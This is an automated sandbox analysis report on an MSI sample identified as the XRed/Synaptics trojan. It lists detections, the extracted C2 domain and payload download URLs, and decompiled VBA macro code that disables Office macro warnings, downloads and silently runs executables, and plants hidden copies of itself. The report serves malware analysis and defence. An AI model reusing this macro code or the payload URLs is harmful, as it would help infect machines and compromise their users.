Edit tour

Windows Analysis Report
docx.msi

Overview

General Information

Sample name:	docx.msi
Analysis ID:	1582333
MD5:	904ac94be4b6b3e1a4bf741d80401879
SHA1:	bfd7f9e4bb42f54c02c4933439c9e90b8c975299
SHA256:	fbbbf890b135445dec6c10625b0fdad8246523ba83e6e052a74e01d3856fb648
Tags:	knkbkk212msiuser-JAMESWT_MHT
Infos:

Detection

XRed

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected XRed

C2 URLs / IPs found in malware configuration

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Document contains an embedded VBA with functions possibly related to HTTP operations

Document contains an embedded VBA macro which executes code when the document is opened / closed

May infect USB drives

Program does not show much activity (idle)

Sample file is different than original file name gathered from version info

Classification

Process Tree

System is w11x64_office

msiexec.exe (PID: 2184 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\docx.msi" MD5: C0D3BDDE74C1EC82F75681D4D5ED44C8)

cleanup

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
docx.msi	JoeSecurity_XRed	Yara detected XRed	Joe Security
docx.msi	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: docx.msi

Malware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Multi AV Scanner detection for submitted file

Source: docx.msi	Virustotal: Detection: 72%			Perma Link
Source: docx.msi	ReversingLabs: Detection: 65%

Source: docx.msi	Binary or memory string: [autorun]
Source: docx.msi	Binary or memory string: [autorun]
Source: docx.msi	Binary or memory string: autorun.inf

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: xred.mooo.com

Source: docx.msi	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Source: docx.msi	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
Source: docx.msi	String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
Source: docx.msi	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
Source: docx.msi	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
Source: docx.msi	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Source: docx.msi	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
Source: docx.msi	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
Source: docx.msi	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
Source: docx.msi	String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

System Summary

Document contains an embedded VBA macro with suspicious strings

Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function SaveAsInj, String environ: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"	Name: SaveAsInj
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function RegKeyRead, String wscript: Set myWS = CreateObject("WScript.Shell")	Name: RegKeyRead
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function RegKeyExists, String wscript: Set myWS = CreateObject("WScript.Shell")	Name: RegKeyExists
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function RegKeySave, String wscript: Set myWS = CreateObject("WScript.Shell")	Name: RegKeySave
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function MPS, String environ: TMP = Environ("Temp") & "\~$cache1.exe"	Name: MPS
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function MPS, String environ: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then	Name: MPS
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function MPS, String environ: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide	Name: MPS
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function MPS, String environ: Elseif FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then	Name: MPS
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function MPS, String environ: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide	Name: MPS
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function FDW, String winhttp.winhttprequest: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")	Name: FDW
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function FDW, String winhttp.winhttprequest: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")	Name: FDW

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Source: VBA code instrumentation

OLE, VBA macro: Module ThisWorkbook, Function FDW, found possibly 'ADODB.Stream' functions open, savetofile, write

Name: FDW

Document contains an embedded VBA with functions possibly related to HTTP operations

Source: VBA code instrumentation

OLE, VBA macro: Module ThisWorkbook, Function FDW, found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send

Name: FDW

Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open			Name: Workbook_Open
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function Workbook_BeforeClose			Name: Workbook_BeforeClose

Source: docx.msi	Binary or memory string: OriginalFileName vs docx.msi
Source: docx.msi	Binary or memory string: OriginalFilenameb! vs docx.msi

Source: classification engine

Classification label: mal80.troj.expl.winMSI@1/0@0/0

Source: Yara match

File source: docx.msi, type: SAMPLE

Source: docx.msi	Virustotal: Detection: 72%
Source: docx.msi	ReversingLabs: Detection: 65%

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: atlthunk.dll	Jump to behavior

Source: docx.msi

Static file information: File size 1736704 > 1048576

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Stealing of Sensitive Information

Yara detected XRed

Source: Yara match

File source: docx.msi, type: SAMPLE

Remote Access Functionality

Yara detected XRed

Source: Yara match

File source: docx.msi, type: SAMPLE

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	31 Scripting	1 Replication Through Removable Media	Windows Management Instrumentation	31 Scripting	1 DLL Side-Loading	1 DLL Side-Loading	OS Credential Dumping	1 Peripheral Device Discovery	Remote Services	Data from Local System	2 Application Layer Protocol	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
docx.msi	72%	Virustotal		Browse
docx.msi	66%	ReversingLabs	Win32.Trojan.Synaptics

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
xred.mooo.com	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://xred.site50.net/syn/Synaptics.rar	docx.msi	false	high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1	docx.msi	false	high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1	docx.msi	false	high
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1	docx.msi	false	high
http://xred.site50.net/syn/SSLLibrary.dll	docx.msi	false	high
http://xred.site50.net/syn/SUpdate.ini	docx.msi	false	high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978	docx.msi	false	high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582333
Start date and time:	2024-12-30 11:26:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	docx.msi
Detection:	MAL
Classification:	mal80.troj.expl.winMSI@1/0@0/0
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .msi Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 204.79.197.203, 23.44.201.4, 184.28.90.27, 20.109.210.53, 20.74.47.205, 40.126.31.71
Excluded domains from analysis (whitelisted): www.bing.com, chrome.cloudflare-dns.com, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, fd.api.iris.microsoft.com, a-0003.a-msedge.net, oneocsp-microsoft-com.a-0003.a-msedge.net, ctldl.windowsupdate.com, oneocsp.microsoft.com, x1.c.lencr.org, ocsp.digicert.com, login.live.com, res.public.onecdn.static.microsoft, ocsp.edge.digicert.com, c.pki.goog
Not all processes where analyzed, report is missing behavior information

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	SecuredOnedrive.ClientSetup.exe	Get hash	malicious	ScreenConnect Tool	Browse	192.229.221.95
	dsoft.exe	Get hash	malicious	Python Stealer, Creal Stealer	Browse	192.229.221.95
	KL-3.1.16.exe	Get hash	malicious	Nitol, Zegost	Browse	192.229.221.95
	2GL073z1wL.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	installer64v1.0.0.msi	Get hash	malicious	Unknown	Browse	192.229.221.95
	test5.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	192.229.221.95
	FIyDwZM4OR.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	ZFttiy4Tt8.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	rpDOUhuBC5.exe	Get hash	malicious	Credential Flusher	Browse	192.229.221.95
	http://volmar.sinformations.cfd	Get hash	malicious	Unknown	Browse	192.229.221.95

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, MSI Installer, Code page: 1252, Last Printed: Fri Sep 21 10:56:09 2012, Create Time/Date: Fri Sep 21 10:56:09 2012, Name of Creating Application: Windows Installer, Title: Exe to msi converter free, Author: www.exetomsi.com, Template: ;0, Last Saved By: devuser, Revision Number: {C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}, Last Saved Time/Date: Tue May 21 12:56:44 2013, Number of Pages: 100, Number of Words: 0, Security: 0
Entropy (8bit):	7.514812620030048
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	docx.msi
File size:	1'736'704 bytes
MD5:	904ac94be4b6b3e1a4bf741d80401879
SHA1:	bfd7f9e4bb42f54c02c4933439c9e90b8c975299
SHA256:	fbbbf890b135445dec6c10625b0fdad8246523ba83e6e052a74e01d3856fb648
SHA512:	c2ff2e02c00e485e3551c6a8b3451cf227f8317e4b908b4fe1202337288937cebffbdbd2f5bc5ae33326ef9e14e9f8c18563bdfe3d6d5c9dad7413b96fbd31e9
SSDEEP:	49152:PEVnsHyjtk2MYC5GDFhloJfjQiCSAKyHI9K9:mnsmtk2aAhl0RC1g
TLSH:	AA85D022F2D28477D1321A7D9C5B93A5582ABF512E38794E7BF83E4C4F3A2812C152D7
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	bdb5fdd8b3b39b1f

Network Behavior

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 30, 2024 11:27:02.807549953 CET	1.1.1.1	192.168.2.24	0xbb2f	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 11:27:02.807549953 CET	1.1.1.1	192.168.2.24	0xbb2f	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	05:27:07
Start date:	30/12/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\docx.msi"
Imagebase:	0x7ff7a67d0000
File size:	176'128 bytes
MD5 hash:	C0D3BDDE74C1EC82F75681D4D5ED44C8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

VBA Code

Call Graph

Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Sayfa1

Declaration

Line	Content
1	Attribute VB_Name = "Sayfa1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True
9	Dim SheetsChanged as Boolean
10	Dim SheetCount as Integer

Non-Executed Functions

Subroutine
MPSAPIs: 83, Strings: 9, Number of lines: 38, Relevance: 162.788

APIs	Meta Information
CreateObject
Path
ActiveWorkbook
Path
ActiveWorkbook
Environ
FileExists
FileExists
FileCopy
Shell
vbHide
FileExists
FileExists
FileCopy
Shell
vbHide
FileExists
Environ
Shell
Environ
vbHide
FileExists
Environ
Shell
Environ
vbHide
FileExists
Part of subcall function FDW@ThisWorkbook: CreateObject
Part of subcall function FDW@ThisWorkbook: CreateObject
Part of subcall function FDW@ThisWorkbook: Option
Part of subcall function FDW@ThisWorkbook: Option
Part of subcall function FDW@ThisWorkbook: AllowRedirects
Part of subcall function FDW@ThisWorkbook: Open
Part of subcall function FDW@ThisWorkbook: Send
Part of subcall function FDW@ThisWorkbook: Status
Part of subcall function FDW@ThisWorkbook: InStr
Part of subcall function FDW@ThisWorkbook: ResponseText
Part of subcall function FDW@ThisWorkbook: CreateObject
Part of subcall function FDW@ThisWorkbook: Open
Part of subcall function FDW@ThisWorkbook: Type
Part of subcall function FDW@ThisWorkbook: Write
Part of subcall function FDW@ThisWorkbook: ResponseBody
Part of subcall function FDW@ThisWorkbook: SaveToFile
Part of subcall function FDW@ThisWorkbook: Close
Part of subcall function FDW@ThisWorkbook: CreateObject
Part of subcall function FDW@ThisWorkbook: CreateObject
Part of subcall function FDW@ThisWorkbook: Option
Part of subcall function FDW@ThisWorkbook: Option
Part of subcall function FDW@ThisWorkbook: AllowRedirects
Part of subcall function FDW@ThisWorkbook: Open
Part of subcall function FDW@ThisWorkbook: Send
Part of subcall function FDW@ThisWorkbook: Status
Part of subcall function FDW@ThisWorkbook: InStr
Part of subcall function FDW@ThisWorkbook: ResponseText
Part of subcall function FDW@ThisWorkbook: CreateObject
Part of subcall function FDW@ThisWorkbook: Open
Part of subcall function FDW@ThisWorkbook: Type
Part of subcall function FDW@ThisWorkbook: Write
Part of subcall function FDW@ThisWorkbook: ResponseBody
Part of subcall function FDW@ThisWorkbook: SaveToFile
Part of subcall function FDW@ThisWorkbook: Close
Part of subcall function FDW@ThisWorkbook: CreateObject
Part of subcall function FDW@ThisWorkbook: CreateObject
Part of subcall function FDW@ThisWorkbook: Option
Part of subcall function FDW@ThisWorkbook: Option
Part of subcall function FDW@ThisWorkbook: AllowRedirects
Part of subcall function FDW@ThisWorkbook: Open
Part of subcall function FDW@ThisWorkbook: Send
Part of subcall function FDW@ThisWorkbook: Status
Part of subcall function FDW@ThisWorkbook: InStr
Part of subcall function FDW@ThisWorkbook: ResponseText
Part of subcall function FDW@ThisWorkbook: CreateObject
Part of subcall function FDW@ThisWorkbook: Open
Part of subcall function FDW@ThisWorkbook: Type
Part of subcall function FDW@ThisWorkbook: Write
Part of subcall function FDW@ThisWorkbook: ResponseBody
Part of subcall function FDW@ThisWorkbook: SaveToFile
Part of subcall function FDW@ThisWorkbook: Close
FileExists
Shell
vbHide
Shell
vbHide

Strings	Decrypted Strings
"scripting.filesystemobject"
"https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
"https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
"https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
"Temp"
"ALLUSERSPROFILE"
"ALLUSERSPROFILE"
"WINDIR"
"WINDIR"

Line	Instruction	Meta Information
147	Sub MPS()
148	Dim FSO as Object
149	Dim FP(1 To 3), TMP, URL(1 To 3) as String
151	Set FSO = CreateObject("scripting.filesystemobject")	CreateObject
152	FP(1) = ActiveWorkbook.Path & "\~$cache1"	Path ActiveWorkbook
153	FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"	Path ActiveWorkbook
155	URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
156	URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
157	URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
158	TMP = Environ("Temp") & "\~$cache1.exe"	Environ
160	If FSO.FileExists(FP(1)) Then	FileExists
161	If Not FSO.FileExists(TMP) Then	FileExists
162	FileCopy FP(1), TMP	FileCopy
163	Endif
164	Shell TMP, vbHide	Shell vbHide
165	Elseif FSO.FileExists(FP(2)) Then	FileExists
166	If Not FSO.FileExists(TMP) Then	FileExists
167	FileCopy FP(2), TMP	FileCopy
168	Endif
169	Shell TMP, vbHide	Shell vbHide
170	Else
171	If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then	FileExists Environ
172	Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide	Shell Environ vbHide
173	Elseif FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then	FileExists Environ
174	Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide	Shell Environ vbHide
175	Elseif Not FSO.FileExists(TMP) Then	FileExists
176	If FDW((URL(1)), (TMP)) Then
177	Elseif FDW((URL(2)), (TMP)) Then
178	Elseif FDW((URL(3)), (TMP)) Then
179	Endif
180	If FSO.FileExists(TMP) Then	FileExists
181	Shell TMP, vbHide	Shell vbHide
182	Endif
183	Else
184	Shell TMP, vbHide	Shell vbHide
185	Endif
187	Endif
189	End Sub

Subroutine
Workbook_OpenAPIs: 45, Strings: 4, Number of lines: 13, Relevance: 87.513

APIs	Meta Information
Sheets
Sheets
xlSheetVisible
Part of subcall function RegKeySave@ThisWorkbook: CreateObject
Part of subcall function RegKeySave@ThisWorkbook: RegWrite
Version
Part of subcall function RegKeySave@ThisWorkbook: CreateObject
Part of subcall function RegKeySave@ThisWorkbook: RegWrite
Version
DisplayAlerts
Count
Worksheets
Part of subcall function MPS@ThisWorkbook: CreateObject
Part of subcall function MPS@ThisWorkbook: Path
Part of subcall function MPS@ThisWorkbook: ActiveWorkbook
Part of subcall function MPS@ThisWorkbook: Path
Part of subcall function MPS@ThisWorkbook: ActiveWorkbook
Part of subcall function MPS@ThisWorkbook: Environ
Part of subcall function MPS@ThisWorkbook: FileExists
Part of subcall function MPS@ThisWorkbook: FileExists
Part of subcall function MPS@ThisWorkbook: FileCopy
Part of subcall function MPS@ThisWorkbook: Shell
Part of subcall function MPS@ThisWorkbook: vbHide
Part of subcall function MPS@ThisWorkbook: FileExists
Part of subcall function MPS@ThisWorkbook: FileExists
Part of subcall function MPS@ThisWorkbook: FileCopy
Part of subcall function MPS@ThisWorkbook: Shell
Part of subcall function MPS@ThisWorkbook: vbHide
Part of subcall function MPS@ThisWorkbook: FileExists
Part of subcall function MPS@ThisWorkbook: Environ
Part of subcall function MPS@ThisWorkbook: Shell
Part of subcall function MPS@ThisWorkbook: Environ
Part of subcall function MPS@ThisWorkbook: vbHide
Part of subcall function MPS@ThisWorkbook: FileExists
Part of subcall function MPS@ThisWorkbook: Environ
Part of subcall function MPS@ThisWorkbook: Shell
Part of subcall function MPS@ThisWorkbook: Environ
Part of subcall function MPS@ThisWorkbook: vbHide
Part of subcall function MPS@ThisWorkbook: FileExists
Part of subcall function MPS@ThisWorkbook: FileExists
Part of subcall function MPS@ThisWorkbook: Shell
Part of subcall function MPS@ThisWorkbook: vbHide
Part of subcall function MPS@ThisWorkbook: Shell
Part of subcall function MPS@ThisWorkbook: vbHide
Select

Strings	Decrypted Strings
"HKCU\Software\Microsoft\Office\"
"REG_DWORD"
"HKCU\Software\Microsoft\Office\"
"REG_DWORD"

Line	Instruction	Meta Information
12	Private Sub Workbook_Open()
13	Dim i as Integer
14	For i = 1 To ActiveWorkbook.Sheets.Count	Sheets
15	ActiveWorkbook.Sheets(i).Visible = xlSheetVisible	Sheets xlSheetVisible
16	Next i	Sheets
18	RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"	Version
19	RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"	Version
21	Application.DisplayAlerts = False	DisplayAlerts
22	SheetCount = Worksheets.Count	Count Worksheets
24	Call MPS()
26	ActiveWorkbook.Sheets(1).Select	Select
27	SheetsChanged = False
28	End Sub

Function
FDWAPIs: 17, Strings: 14, Number of lines: 25, Relevance: 56.025

APIs	Meta Information
CreateObject
CreateObject
Option
Option
AllowRedirects
Open
Send
Status
InStr
ResponseText
CreateObject
Open
Type
Write
ResponseBody
SaveToFile
Close

Strings	Decrypted Strings
"WinHttp.WinHttpRequest.5.1"
"WinHttp.WinHttpRequest.5"
"WinHttp.WinHttpRequest.5"
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
"GET"
"404 Not Found"
">Not Found<"
"ADODB.Stream"
"Dropbox - Error"
"404 Not Found"
">Not Found<"
"ADODB.Stream"
"Dropbox - Error"
"ADODB.Stream"

Line	Instruction	Meta Information
191	Function FDW(MYU, NMA as String) as Boolean
192	Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")	CreateObject
193	If WinHttpReq Is Nothing Then
194	Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")	CreateObject
195	Endif
197	WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"	Option
198	WinHttpReq.Option(6) = AllowRedirects	Option AllowRedirects
199	WinHttpReq.Open "GET", MYU, False	Open
200	WinHttpReq.Send	Send
202	If (WinHttpReq.Status = 200) Then	Status
203	If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then	InStr ResponseText
204	FDW = True
205	Set oStream = CreateObject("ADODB.Stream")	CreateObject
206	oStream.Open	Open
207	oStream.Type = 1	Type
208	oStream.Write WinHttpReq.ResponseBody	Write ResponseBody
209	oStream.SaveToFile (NMA)	SaveToFile
210	oStream.Close	Close
211	Else
212	FDW = False
213	Endif
214	Else
215	FDW = False
216	Endif
217	End Function

Subroutine
SaveAsInjAPIs: 8, Strings: 2, Number of lines: 12, Relevance: 19.262

APIs	Meta Information
CreateObject
Environ
FileExists
FileExists
FileCopy
SetAttr
vbHidden
vbSystem

Strings	Decrypted Strings
"scripting.filesystemobject"
"ALLUSERSPROFILE"

Line	Instruction	Meta Information
102	Sub SaveAsInj(DIR as String)
103	Dim FSO as Object
104	Dim FN as String
106	Set FSO = CreateObject("scripting.filesystemobject")	CreateObject
107	FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"	Environ
109	If FSO.FileExists(FN) Then	FileExists
110	If Not FSO.FileExists(DIR & "\~$cache1") Then	FileExists
111	FileCopy FN, DIR & "\~$cache1"	FileCopy
112	Endif
113	SetAttr (DIR & "\~$cache1"), vbHidden + vbSystem	SetAttr vbHidden vbSystem
114	Endif
115	End Sub

Function
RegKeyExistsAPIs: 2, Strings: 1, Number of lines: 10, Relevance: 7.01

APIs	Meta Information
CreateObject
RegRead

Strings	Decrypted Strings
"WScript.Shell"

Line	Instruction	Meta Information
125	Function RegKeyExists(i_RegKey as String) as Boolean
126	Dim myWS as Object
128	On Error Goto ErrorHandler
129	Set myWS = CreateObject("WScript.Shell")	CreateObject
130	myWS.RegRead i_RegKey	RegRead
131	RegKeyExists = True
132	Exit Function
133	ErrorHandler:
135	RegKeyExists = False
136	End Function

Function
RegKeyReadAPIs: 2, Strings: 1, Number of lines: 6, Relevance: 7.006

APIs	Meta Information
CreateObject
RegRead

Strings	Decrypted Strings
"WScript.Shell"

Line	Instruction	Meta Information
117	Function RegKeyRead(i_RegKey as String) as String
118	Dim myWS as Object
120	On Error Resume Next
